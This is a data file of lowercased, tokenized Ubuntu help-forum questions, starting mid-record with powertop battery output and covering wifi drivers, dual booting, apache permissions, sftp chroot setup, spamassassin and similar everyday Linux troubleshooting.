ms/s 63.2 kwork od_dbs_timer 0 mw 1.3 ms/s 0.00 timer delayed_work_timer_fn 0 mw 0.9 ms/s 0.05 kwork acpi_os_execute_deferred 0 mw 0.8 ms/s 0.00 interrupt [ 1 ] timer ( softirq ) 0 mw 0.7 ms/s 53.4 kwork disk_events_workfn 0 mw 629.9 µs/s 0.8 process chromium-browser -- enable-pinch 0 mw 561.9 µs/s 19.5 process /home/desousa/.rvm/rubies/ruby-1.9.2-p290/bin/ruby script/rails s 0 mw 508.1 µs/s 0.10 process powertop 0 mw 496.9 µs/s 5.3 process /opt/ibm/lotus/notes/framework/rcp/eclipse/plugins/com.ibm.rcp.base_6.2.3.20110915-1350/linux/x86/notes2 -- launcher.suppresserr 0 mw 468.2 µs/s 0.8 interrupt [ 7 ] sched ( softirq ) 0 mw 281.6 µs/s 4.1 interrupt [ 4 ] block ( softirq ) 0 mw 276.5 µs/s 3.1 kwork iwl_bg_run_time_calib_work 0 mw 260.5 µs/s 0.00 interrupt ps/2 touchpad / keyboard / mouse 0 mw 200.0 µs/s 15.6 kwork intel_unpin_work_fn 0 mw 173.5 µs/s 4.6 process /usr/lib/jvm/java-6-sun/jre/bin/java -djava.util.logging.config.file=/usr/share/tomcat7/conf/logging.properties -djava.util.log 0 mw 160.9 µs/s 0.00 process [ kworker/u16:0 ] 0 mw 160.3 µs/s 0.25 process pool 0 mw 159.0 µs/s 0.00 interrupt [ 9 ] rcu ( softirq ) 0 mw 147.4 µs/s 4.0 process /usr/sbin/mysqld 0 mw 144.9 µs/s 0.4 interrupt [ 9 ] acpi 0 mw 131.4 µs/s 10.3 interrupt [ 44 ] iwlwifi 0 mw 129.5 µs/s 2.0 process /usr/lib/firefox/plugin-container /opt/google/talkplugin/libnpgoogletalk.so -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib 0 mw 128.7 µs/s 4.7 kwork ieee80211_iface_work 0 mw 118.9 µs/s 0.00 interrupt [ 40 ] sata controller update v : i used the information provided by powertop to make a few calculations : at the discharge rate reported , the battery right now has about 32 wh of capacity ; the battery is advertised with a capacity close to 100 wh when new , lasting up to 15 hours ; with ubuntu 12.04 the battery was lasting about 4.5 hours , about 1/3 of 15 hours , squaring exactly with a loss of 2/3 of capacity ; thus , with ubuntu 12.04 the average discharge rate must have been around 7 w. an increase of power consumption from 7 w to 32 w is nothing short of catastrophic . whatever is causing this must be far more serious than just some guzzler application or a misconfigured package . update vi : i am writing this from a live 14.04 session loaded from a usb key . power consumption seems to be somewhat lower than with the hdd system ( 80 % - 90 % ) , which can be explained by a reduced number of services and applications running . still , battery lifetime is far lower than what it was with ubuntu 12.04 . update vii : the abnormally high discharge rates are back , apparently after an upgrade to linux-headers-generic around the 15th of july . this is now reported as a bug at launchpad . any hints on how to bring back battery lifetime would be much appreciated .
461621	rtl8723ae pcie driver problem	i have looked at this question but i get this error while compiling and am unable to load the module afterwards : make -c /lib/modules/3.13.0-24-generic/build m=/home/owner/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013_patched modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.13.0-24-generic' cc [ m ] /home/owner/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013_patched/base.o /home/owner/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013_patched/base.c : in function ‘rtl_action_proc’ : /home/owner/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013_patched/base.c:885:32 : error : ‘struct ieee80211_conf’ has no member named ‘channel’ rx_status.freq = hw- > conf.channel- > center_freq ; ^ /home/owner/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013_patched/base.c:886:32 : error : ‘struct ieee80211_conf’ has no member named ‘channel’ rx_status.band = hw- > conf.channel- > band ; ^ /home/owner/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013_patched/base.c : in function ‘rtl_send_smps_action’ : /home/owner/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013_patched/base.c:1451:24 : error : ‘struct ieee80211_conf’ has no member named ‘channel’ info- > band = hw- > conf.channel- > band ; ^ make [ 2 ] : *** [ /home/owner/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013_patched/base.o ] error 1 make [ 1 ] : *** [ _module_/home/owner/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013_patched ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-24-generic' make : *** [ all ] error 2 owner @ computer : ~/desktop/rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013_patched $ this occurs with both the driver listed in the first link and the patched driver that i found . i have also already tried disabling both the bluetooth and the adaptor . also i tried iwconfig wlan0 txpower 30 .
461622	dual boot windows 7 home premium and ubuntu 14.04	i have a sony vaio laptop with 4 gb ram.it has windows 7 home premium by default.i want to dual boot it with ubuntu 14.04.how do i do it ? my laptop does not boot windows properly and shows logon initialization failure error.i can not use safeboot as it hangs as soon as i select the option.it also can not detect wifi , usb , cd/dvd.how can i dual boot it ? i also do not have the windows disk .
461624	security questions ?	how can i check that ubuntu is 100 % secure ? should i install a firewall , antivirus , malware software , or any other security or are their security software programs installed by default ?
461626	how to retrieve password ?	i can not upgrade to 14.04 since it requires authentication . how come my password is always denied when in fact i have not changed it so far ? how can i retrieve my password when there is no option of retrieving it ?
461631	dual display on macbook pro 9,1 with ubuntu 14.04	i successfully installed ubuntu 14.04 on my macbook pro 9,1 . everything is now working correctly . except i am unable to plug in a second screen . if i plug in another screen : at system boot : i get no display ( black screen ) after the initial console messages related to system start . though in the black screen if i press ctrl+alt+f2 - > type my username - > type my password - > type sudo reboot - > type password . then i can still reboot successfully . at runtime : i can see the second screen being detected by nvidia-setting page . but still the second screen has no display i have tried the following : change the drivers to nouveau drivers use the nvidia 331.38 drivers install bumblebee : this gave me a black screen on my main monitor and i had to reinstall the nvidia drivers after removing bumblebee . i was using this link for installing bumblebee.but after rebooting my display goes away . the output for lspci | grep vga is : 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 650m mac edition ] ( rev a1 ) please advice how i can have the second screen on my macbook pro . my current driver version : 331.67 updates : 1 . when i connected displayport-to-hdmi converter to my hdmi tv screen the second display started working as it is . i then tested my old monitor ( which only has d-sub connector ) using the chain : displayport-to-hdmi adapter- > hdmi-dsub adapter- > dsub input of my monitor . after changing to the correct resolution , my monitor is now acting as a secondary display . so i guess the problem is either : 1 . with display-port to d-sub adapter i have ( its china made ) 2 . or there is a problem with all the display-port to d-sub adapters . i will test my friends adapter and post here later .
461632	downloading other users files on ubuntu one	i have tried to download my from ubuntu one web interface ( download all my files as .zip ) but i got the file of another user ! when browsing i see my files but at download thefiles are not mine .
461636	turn off battery control in ubuntu 12.04	i own a lenovo ideapad yoga 11s that suffered from battery failure when i poured coffee over the keyboard . i have checked the battery voltage manually and it is full . the computer also seem to be able to use the battery , it can sleep for extended periods without dying . however , as soon as i unplug it ubuntu turns the computer to sleep to protect the data since the internal voltmeter seem to indicate zero charge . how can i turn off this feature ? i understand that it would mean i would n't be able to check the battery status , but it would be an acceptable trade off to be able to use the machine untethered .
461641	changing root directory in apache2 is giving 403 error	i have installed apache/2.4.7 ( ubuntu ) in my ubuntu ( 14.04 ) . i have changed two configuration files to change the default documentroot of apache which is /var/www to /home/name/www . the files i have changed are /etc/apache2/apache2.conf and /etc/apache2/sites-available/000-default.conf . in apache2.conf i put < directory /home/name/www > options indexes followsymlinks allowoverride none require all granted < /directory > and in 000-default.conf i changed , documentroot /home/name/www my /home/name/www file has necessary permissions . drwxr-xr-x 3 www-data www-data www but when i try to access localhost from browser i receive you do n't have permission to access / on this server . error . what have i missed ?
461645	ca n't install 3g broadband on ubuntu 14.04 lts	i bought a huawei e3131 broadband dongle via a telecommunication company . there is a setup.exe in the dongle and i think i must install it because online/offline mode operate via this program . i ca n't start the setup.exe even i tried wine get this error : there is no exe file no there is a big setup.exe file , i can see it . how can i install my dongle driver , or use it without installation ? thanks to all . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - okay guys i installed the driver , it does n't work but i installed it .
461646	shutdown hangs for 5 minutes on kubuntu 14.04	i 've had persistent problems with a 5 minute hang at shutdown for the last three versions of kubuntu ( 13.04 , 13.10 , and now 14.04 ) . i suspect this is not a kde-specific problem . recently , i performed a fresh installation of kubuntu 14.04 from a live-usb , and shutdown worked normally for about a week . the hang-up is now happening again , and i ca n't figure out why . a brief description of the problem : the hang-up occurs with all methods of initiating a normal shutdown : clicking the shutdown or restart button in kde , sudo shutdown -h now , sudo reboot the shutdown splash screen appears . using the down-arrow to access verbose messages , i see `` asking all remaining processes to terminate . '' this message remains for 5 minutes with no disk activity . finally , a rapid series of messages flurries to the screen : * all processes ended within 300 seconds ... [ ok ] nm-dispatcher.action : caught signal 15 , shutting down ... modemmanager [ 852 ] : < warn > could not acquire the 'org.freedesktop.modemmanager1 ' service name modemmanager [ 852 ] : < info > modemmanager is shut down * deactivating swap ... [ ok ] * unmounting local filesystems ... [ ok ] * will now restart` possible sources of the problem : before the problem re-appeared , i have mainly been doing routine computing . i have kept the system up-to-date using apt-get upgrade and apt-get dist-upgrade . the only other notable incident was a power failure . i do not have the computer connected to a ups , so the power failure resulted in an immediate shutdown . could this have corrupted an important file which must be accessed at shutdown ? is there any way that could cause a 5-minute hang-up ? here is a list of packages that have been updated before the problem appeared : bash iotop dpkg dpkg-dev python3-software-properties libdpkg-perl software-properties-kde software-properties-common akonadi-backend-mysql libakonadiprotocolinternals1 akonadi-server firefox-locale-en firefox flashplugin-installer libqapt2 libqapt2-runtime thunderbird openjdk-7-jre-headless thunderbird-locale-en kubuntu-driver-manager qapt-deb-installer openjdk-7-jre qapt-batch icedtea-7-jre-jamvm libelf1 dpkg dpkg-dev libdpkg-perl libjbig0 gettext-base libgettextpo-dev libssl1.0.0 libgettextpo0 libasprintf-dev linux-headers-3.13.0-24 gettext libasprintf0c2 linux-headers-3.13.0-24-generic openssl linux-libc-dev gstreamer0.10-qapt kubuntu-desktop linux-image-extra-3.13.0-24-generic linux-image-3.13.0-24-generic i would appreciate any help with this .
461647	sftp restriction and ssh problem	i configured a folder to be restricted to the individual user . sudo nano /etc/ssh/sshd_config subsystem sftp /usr/lib/openssh/sftp-server subsystem sftp internal-sftp match group s-user chrootdirectory /home/ % u forcecommand internal-sftp passwordauthentication yes x11forwarding no allowtcpforwarding no service ssh restart and now create the user and group : sudo groupadd s-user sudo adduser < username > sudo usermod -a -g s-user < username > sudo chown root : root /home/ < username > / this is the error in the auth.log file may 6 10:54:27 vps sshd [ 3944 ] : pam_unix ( sshd : session ) : session opened for user < username > by ( uid=0 ) may 6 10:54:28 vps sshd [ 3944 ] : pam_unix ( sshd : session ) : session closed for user < username >
461648	upgrade conflicts with some packages , in particular - violetland	ubuntu 12.04 's last upgrade deleted game `` violetland '' . when i tried to ( re ) install it , it wants two older packages the following packages have unmet dependencies : violetland : depends : libboost-filesystem1.54.0 but it is not installable depends : libboost-system1.54.0 but it is not installable i downgraded them and installed the game . now , the new upgrade again wants to delete it and a few other packages . why is it so ? what i can do ? maybe there will be some new problems if i do n't upgrade ? also , i afraid , that in the future it might be more difficult conflicts if no-one provides some solution . i think , that the problems will appear not only with this game . any ideas ?
461651	sequence of files used when booting the lubuntu 14.04	how can i find out which files the lubuntu 14.04 in fact uses during the boot - from the very start when i turn on the power . i 'm new to this linux world , but i think lubuntu must have list of configuration files it searches for - maybe finding them or not finding them . especially i 'm interested in seeing what is going on before the logon dialog . i 'm not interested in what ? ? ubuntu xx.yy did way back but what lubutu 14.04 does right now on my machine .
461652	alsa sound problem	i 've tried to make bluetooth working but as result i 've got a not working soundcard cat /proc/asound/cards 0 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xd3610000 irq 49 aplay -l **** liste der hardware-ger채te ( playback ) **** alsa lib conf.c:1686 : ( snd_config_load1 ) _toplevel_:5:0 : unexpected char alsa lib conf.c:3406 : ( config_file_open ) /home/gogg/.asoundrc may be old or corrupted : consider to remove or fix it alsa lib conf.c:3328 : ( snd_config_hooks_call ) function snd_config_hook_load returned error : das argument ist ung체ltig alsa lib conf.c:3777 : ( snd_config_update_r ) hooks failed , removing configuration aplay : device_list:277 : control open ( 0 ) : das argument ist ung체ltig any solution ? please help : )
461653	how to install intel corporation valleyview gen7 in ubuntu 12.10	i have installed ubuntu 12.10 with my hp laptop model 15-d001sk . it so happens that the graphics driver is not installed . by typing lspci 00:02.0 vga compatible controller : intel corporation valleyview gen7 ( rev 0a ) my resolution can not rise beyond 1024x768 instead of 1366x768 if anyone can help me how to install it ? thank 's in advance
461654	how to add element to the gsettings array at the specific location ( given by index ) ?	i want to write a script that translates devilspie 's window rules into compiz ' rules . compiz settings can be changed by gsettings keys in path org.compiz.profiles.unity.plugins.place . there are three keys : viewport-matches , viewport-x-values and viewport-y-values . unfortunately each key is an array , and the index of the elements matters . gsettings lacks any support of array types other than rewriting whole array at once , and i need to place item in the array at the specific location ( say , at the beginning , index '1 ' ) . i know , that if i do n't care about the index , i can use gsettings set $ { schema } $ { key } \ '' `gsettings get $ { schema } $ { key } | sed s/. $ //` , $ { value } ] \ '' the question complements how to remove element from gsettings array in script ?
461656	unable to update my ubuntu server 14.04 using apt-get update	i am unable to update my ubuntu server 14.04 using apt-get update . outcome is : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/trusty/inrelease and another error is : /usr/local/snort/bin/snort : error while loading shared libraries : libdnet.1 : can not open shared object how can i solve this ?
461657	integrated webcam not detected after update to 14.04	yesterday i updated my thinkpad t530 from ubuntu 13.10 to 14.04 ( both x64 ) . since then the integrated webcam is not working anymore . i tried to use it with skype and google hangouts , but it says that no video device is found . i found some solutions but they did not work . first thing i did was to check if the integrated webcam is activated in bios settings . then i found this `` how can i get my webcam to work with ubuntu 14.04 ? '' but i do n't have any /dev/video* device . can anybody tell me what to do ? thanks .
461659	wifi dropping consistently on realtek rtl8723ae	i have ubuntu 14.04 , however , this problem existed on my install of 13.04 too . when i use my laptop at university over the wi-fi , the connection is lost often . at home on my wi-fi network the connection never drops . the only difference between the connections that i know of is that the university one uses a proxy and automatic proxy config script . are there any steps i can take to diagnose the problem and perhaps fix it ? description : wireless interface product : rtl8723ae pcie wireless network adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : wlan0 version : 00 serial : 20:16 : d8 : d4:14 : cf width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8723ae driverversion=3.13.0-24-generic firmware=n/a ip=10.0.0.8 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:18 ioport : d000 ( size=256 ) memory : f7900000-f7903fff edit : this is from the log files after my internet has disconnected . may 19 09:23:58 jethro-laptop kernel : [ 407.463513 ] wlan0 : associate with cc : d5:39 : d1:95:90 ( try 1/3 ) may 19 09:23:58 jethro-laptop networkmanager [ 767 ] : < info > ( wlan0 ) : supplicant interface state : authenticating - > associating may 19 09:23:58 jethro-laptop wpa_supplicant [ 4100 ] : wlan0 : associated with cc : d5:39 : d1:95:90 may 19 09:23:58 jethro-laptop kernel : [ 407.468895 ] wlan0 : rx assocresp from cc : d5:39 : d1:95:90 ( capab=0x431 status=0 aid=41 ) may 19 09:23:58 jethro-laptop kernel : [ 407.469141 ] wlan0 : associated may 19 09:23:58 jethro-laptop kernel : [ 407.469260 ] cfg80211 : calling crda for country : za may 19 09:23:58 jethro-laptop kernel : [ 407.473538 ] cfg80211 : regulatory domain changed to country : za may 19 09:23:58 jethro-laptop kernel : [ 407.473545 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) may 19 09:23:58 jethro-laptop kernel : [ 407.473550 ] cfg80211 : ( 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) may 19 09:23:58 jethro-laptop kernel : [ 407.473554 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) may 19 09:23:58 jethro-laptop kernel : [ 407.473559 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 19 09:23:58 jethro-laptop kernel : [ 407.473563 ] cfg80211 : ( 5490000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) may 19 09:23:58 jethro-laptop kernel : [ 407.473567 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) may 19 09:23:58 jethro-laptop networkmanager [ 767 ] : < info > ( wlan0 ) : supplicant interface state : associating - > associated may 19 09:23:58 jethro-laptop networkmanager [ 767 ] : < info > ( wlan0 ) : supplicant interface state : associated - > 4-way handshake may 19 09:23:58 jethro-laptop wpa_supplicant [ 4100 ] : wlan0 : wpa : key negotiation completed with cc : d5:39 : d1:95:90 [ ptk=ccmp gtk=tkip ] may 19 09:23:58 jethro-laptop wpa_supplicant [ 4100 ] : wlan0 : ctrl-event-connected - connection to cc : d5:39 : d1:95:90 completed [ id=0 id_str= ] may 19 09:23:58 jethro-laptop networkmanager [ 767 ] : < info > ( wlan0 ) : supplicant interface state : 4-way handshake - > completed may 19 09:23:58 jethro-laptop networkmanager [ 767 ] : < info > ( wlan0 ) : roamed from bssid ( none ) ( ( none ) ) to cc : d5:39 : d1:95:90 ( eduroam ) may 19 09:23:57 jethro-laptop whoopsie [ 968 ] : message repeated 6 times : [ offline ] may 19 09:23:58 jethro-laptop whoopsie [ 968 ] : online may 19 09:24:00 jethro-laptop networkmanager [ 767 ] : < info > wpa_supplicant die count reset may 19 09:24:06 jethro-laptop ntpdate [ 4228 ] : adjust time server 91.189.94.4 offset -0.006569 sec may 19 09:24:12 jethro-laptop networkmanager [ 767 ] : < info > ( wlan0 ) : ip6 addrconf timed out or failed . may 19 09:24:12 jethro-laptop networkmanager [ 767 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... may 19 09:24:12 jethro-laptop networkmanager [ 767 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... may 19 09:24:12 jethro-laptop networkmanager [ 767 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . may 19 09:24:14 jethro-laptop wpa_supplicant [ 4100 ] : wlan0 : ctrl-event-scan-started
461660	install ubuntu problem	i m trying to install ubuntu into my windows xp 32 i have been trying the 2 ways ; cd , flash drive , so far i ca n't install it . for the cd it seems like my cd drive is broken , and when i followed the tutorial about how to install with the usb flash drive i computer can not boot from usb flash drive . is there another way to install ubuntu ? i heard about the installer and i read as well that it was remove from the main ubuntu iso file since version 10.4 . is there a way to get the installer with ubuntu old version and update ? how can i install ubuntu if all the ways are not working . please do n't tell i stuck with this xp
461661	disable teamviewer notification	i use ubuntu 12.04 64bit . i am annoyed by teamviewer notification when i minimize teamviewer window . i depict as figure below the message says that `` click here to disable '' but the fact it does n't . i search in option menu but the these options may not be related to . i wonder if there is anyway to disable notification like that ones ?
461662	spamassassin : how to enable spamassassin for my email ?	by following this link , i have installed 'spamassassin ' in my ubuntu 14.04 , but i have no idea how to enable it for my email id , when i run the following comment , nano /etc/default/spamassassin i got as , and i am stuck in here , i tried ^g ^r ^x but noting happening ... please anyone help me ...
461665	bash reading array in different format	i use the below script to read the articles , and then display the articles . echo `` please enter device no '' read -a articles index=0 count= $ { # articles [ @ ] } echo `` the number of articles are $ count '' while [ $ index -lt $ count ] do echo $ { articles [ $ index ] } index= $ index+1 done but the issue is , i need to give articles via the spaces like article1 article2 article3 ? is there a way , i can input via comma like article1 , article2 , article3 ? the array should accept in both ways ( either comma or spaces ) ? any pointers appreciated !
461667	synaptic touchpad stopped working	after working several days continuously with a usb mouse , yesterday i noticed that my touchpad was not working . i 've been using windows as well this days , so , my first thought was that i could have left disabled the touchpad in windows ( i can not re-enable it in ubuntu ) , so i double checked that , but wih no luck . the touchpad get recognised in the kernel as xinput -- list throws : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ a4tech usb device id=10 [ slave pointer ( 2 ) ] ⎜ ↳ a4tech usb device id=11 [ slave pointer ( 2 ) ] ⎜ ↳ ps/2 synaptics touchpad id=14 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ toshiba web camera - hd id=12 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=13 [ slave keyboard ( 3 ) ] ↳ toshiba input device id=15 [ slave keyboard ( 3 ) ] and cat /proc/bus/input/devices i : bus=0011 vendor=0002 product=0001 version=0000 n : name= '' ps/2 synaptics touchpad '' p : phys=isa0060/serio1/input0 s : sysfs=/devices/platform/i8042/serio1/input/input14 u : uniq= h : handlers=mouse1 event12 b : prop=0 b : ev=7 b : key=70000 0 0 0 0 b : rel=3 it shows as well at the mouse config dialog : so here we are , everything seems right but , touchpad does not work . while it has nor problem in windows ... plus , booting to a live cd did n't work neither .
461668	xrandr command - what it actually says about current resolution ?	http : //paste.ubuntu.com/7403435/ i pasted there what the output of xrandr command gave me . i am not sure about the little star ( * ) meaning . and the ( + ) sign . 1920x1080 60.0*+ is that my monitor 's current refresh rate ( its refresh rate in this moment ) ?
461671	how to open a driver ( only the windows edition ) for my usb headset ?	i use a usb gaming headset , cavimanus virtual 7.1 channel . it works perfect and without any problem in ubuntu , and i can hear all the sound . but the thing is the sorround effect . i 'm not absolutely sure , but the quality sound from the song two steps from hell - destructo ( and activating vibrations from headset ) i think is the same from windows ( or almost the same ) . but when i play a video ( a specific one because in that video i can hear the difference ) in vlc media player , i can hear that is really different the sorround effect from windows with the drivers for that os . so i ask if is there a solution for the drivers , because i do n't find any configuration for the headset in ubuntu ( because in windows it opens a window where you can configure the sound displayed in the headset ) .
461672	ca n't get rid of wdm	i have a minimal installation of ubuntu 14.04 with dwm as window manager . the display manager wdm was installed as a dependency and is launched at every boot . but all i want is a manual login to x with startx ( .xinitrc is configured with exec dwm ) . i disabled the service wdm using bum , but when i launch startx i got the error message only root wants to run wdm the same error message appears after removing wdm completely with its dependencies . i also modified in vain the parameter splash quiet of /etc/default/grub to text . i used to setup debian and archlinux systems without having this problem . is it specific to ubuntu ? what is the proper way to resolve my issue ? i hope there wo n't be a confusion concerning the couple wdm/dwm ...
461674	is the download live dvd image of ubuntu up to date ?	is the live dvd image of ubuntu on official site of ubuntu up to date ? because i couldnot install ubutnu 14.04 from live cd because of blackscreen .
461676	python pip says attributeerror with xmlrpc	i got this error when i update pip . /usr/local/bin/pip run on tue may 6 15:03:16 2014 exception : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/pip/basecommand.py '' , line 122 , in main status = self.run ( options , args ) file `` /usr/lib/python2.7/dist-packages/pip/commands/search.py '' , line 40 , in run pypi_hits = self.search ( query , index_url ) file `` /usr/lib/python2.7/dist-packages/pip/commands/search.py '' , line 54 , in search hits = pypi.search ( { 'name ' : query , 'summary ' : query } , 'or ' ) file `` /usr/lib/python2.7/xmlrpclib.py '' , line 1224 , in __call__ return self.__send ( self.__name , args ) file `` /usr/lib/python2.7/xmlrpclib.py '' , line 1578 , in __request verbose=self.__verbose file `` /usr/lib/python2.7/xmlrpclib.py '' , line 1264 , in request return self.single_request ( host , handler , request_body , verbose ) file `` /usr/lib/python2.7/xmlrpclib.py '' , line 1292 , in single_request self.send_content ( h , request_body ) file `` /usr/lib/python2.7/xmlrpclib.py '' , line 1439 , in send_content connection.endheaders ( request_body ) file `` /usr/lib/python2.7/httplib.py '' , line 969 , in endheaders self._send_output ( message_body ) file `` /usr/lib/python2.7/httplib.py '' , line 829 , in _send_output self.send ( msg ) file `` /usr/lib/python2.7/httplib.py '' , line 805 , in send self.sock.sendall ( data ) **attributeerror : 'nonetype ' object has no attribute 'sendall'**
461677	installed gnome shell desktop environment on ubuntu 14.04 but its not working ?	i had installed the gnome shell desktop environment on my ubuntu 14.04 but its not working . i had been told that after installing it ; i would be getting options at the log in time -'asking me ' which environments i would like to use . but nothing of that sort had happened . i am still stuck up with my unity environment . i had used this command : sudo apt-get install gnome-shell
461681	eclipse error aapt : error while loading shared libraries : no such file or directory	how to solve this error ? [ 2014-05-06 15:21:42 - ahmed ] /home/naeem/downloads/adt-bundle-linux-x86_64-20140321/sdk/build-tools/android-4.4.2/aapt : error while loading shared libraries : libz.so.1 : can not open shared object file : no such file or directory
461682	ubuntu 14.04 touchpad settings disappeared on dell latitude e5530	after the release upgrade to 14.04 , the touchpad settings disappeared on my dell latitude e5530 . has anyone the same problem ? do you know how to solve it ? thanks
461683	how to find a keyword in `` nano '' editor in ubuntu ?	i am trying to find some keywords in a configuration file which is opened by nano editor , so can anyone help me to find keywords in this editor ? thank you .
461684	i ca n't start spamassassin service	i have installed and configured spammassassin in my system ( 14.04 ) using this tutor . when i start a service using , service spamassassin start am getting response as , starting spamassassin mail filter daemon : server socket setup failed , retry 1 : spamd : could not create io : :socket : :inet6 socket on [ : :1 ] :783 : can not assign requested address server socket setup failed , retry 2 : spamd : could not create io : :socket : :inet6 socket on [ 127.0.0.1 ] :783 : address already in use server socket setup failed , retry 3 : spamd : could not create io : :socket : :inet6 socket on [ 127.0.0.1 ] :783 : address already in use server socket setup failed , retry 4 : spamd : could not create io : :socket : :inet6 socket on [ 127.0.0.1 ] :783 : address already in use server socket setup failed , retry 5 : spamd : could not create io : :socket : :inet6 socket on [ 127.0.0.1 ] :783 : address already in use server socket setup failed , retry 6 : spamd : could not create io : :socket : :inet6 socket on [ 127.0.0.1 ] :783 : address already in use server socket setup failed , retry 7 : spamd : could not create io : :socket : :inet6 socket on [ 127.0.0.1 ] :783 : address already in use server socket setup failed , retry 8 : spamd : could not create io : :socket : :inet6 socket on [ 127.0.0.1 ] :783 : address already in use server socket setup failed , retry 9 : spamd : could not create io : :socket : :inet6 socket on [ 127.0.0.1 ] :783 : address already in use spamd : could not create io : :socket : :inet6 socket on [ 127.0.0.1 ] :783 : address already in use i have tried , netstat -lptn it 's showing , there is process running with 127.0.1.1:783 also tried , sudo netstat -lepnt am getting , here too not showing any process run with 127.0.1.1:783 please tell me where the problem cause ?
461691	vlc player issue on ubuntu 14.04	vlc player is n't working in ubuntu 14.04 . it gives this error : vlc media player 2.1.5 rincewind ( revision 2.1.2+git20140426+r54526+18+11~ubuntu14.04.1 ) segmentation fault ( core dumped ) how can i solve this issue ?
461700	chrome unity shortcut acting up	whenever i click on my chrome shortcut i get a new window ( as expected ) but i also get a new unity entry with a different icon ( one from an iconset i had been using before upgrading to 14.04 - do n't really remember the name ) . the new unity entry does not seem to originate from a correct .desktop entry because all the submenus are missing from it ( new incognito window , new window etc . ) and it has a permanent tag ' ( 1 ) facebook ' no matter the window title ( see attached picture ) . i have uninstalled and reinstalled chrome in hope that it would help which it did until restart but now i get the same behaviour . note that i have n't altered any .desktop files regarding chrome and i can only find one file : /usr/share/applications/google-chrome.desktop which seems to be correct ( with submenus etc . )
461701	disable all unity keyboard shortcuts using the command line	i would like to know how i can disable all keyboard shortcuts via the terminal . i know you can disable them by going to : system settings > keyboard > shortcuts but i want to disable them via terminal . anyone knows how this can be done ?
461704	vhdl compiler and simulator for ubuntu 14.04	i am searching for good vhdl compiler and simulator . which packages do i need to install ? thank you .
461705	how to increase memory allocated to java ? java.lang.outofmemoryerror : java heap space	i have an ubuntu server 12.04 using a reverse proxy so that tomcat runs on top of apache . and i have a confluence instance on that machine , and a ticket system . so nothing special . memory is 8gb that 's more than enough for this use . from time to time , and in the last few days more often my confluence page crashes . the log ( confluence\logs\catalina.2014-05-06 ) shows this : severe : socket accept failed java.lang.outofmemoryerror : java heap space so how can i avoid this ? how can i give that process more memory .
461706	is it okay ( or not ) to symlink libraries to overcome `` can not open shared object '' errors ?	sometimes , for one reason or another , a program has n't specified or included all its dependencies correctly , and starting it up results in errors indicating missing dependencies . a typical error is something like : can not open shared object libudev.so.0 i see a lot of answers advising people to work around such problems by making symlinks in /usr/lib or other system locations , and this does seem to often solve the problem . but i see an equal number of comments advising people that it 's a bad idea . here 's one answer that 's representative . under what circumstances is it acceptable to symlink a library to make a program work ? never ? sometimes ? what if you delete the symlink after you finish running the program ? what are the the consequences of doing this ?
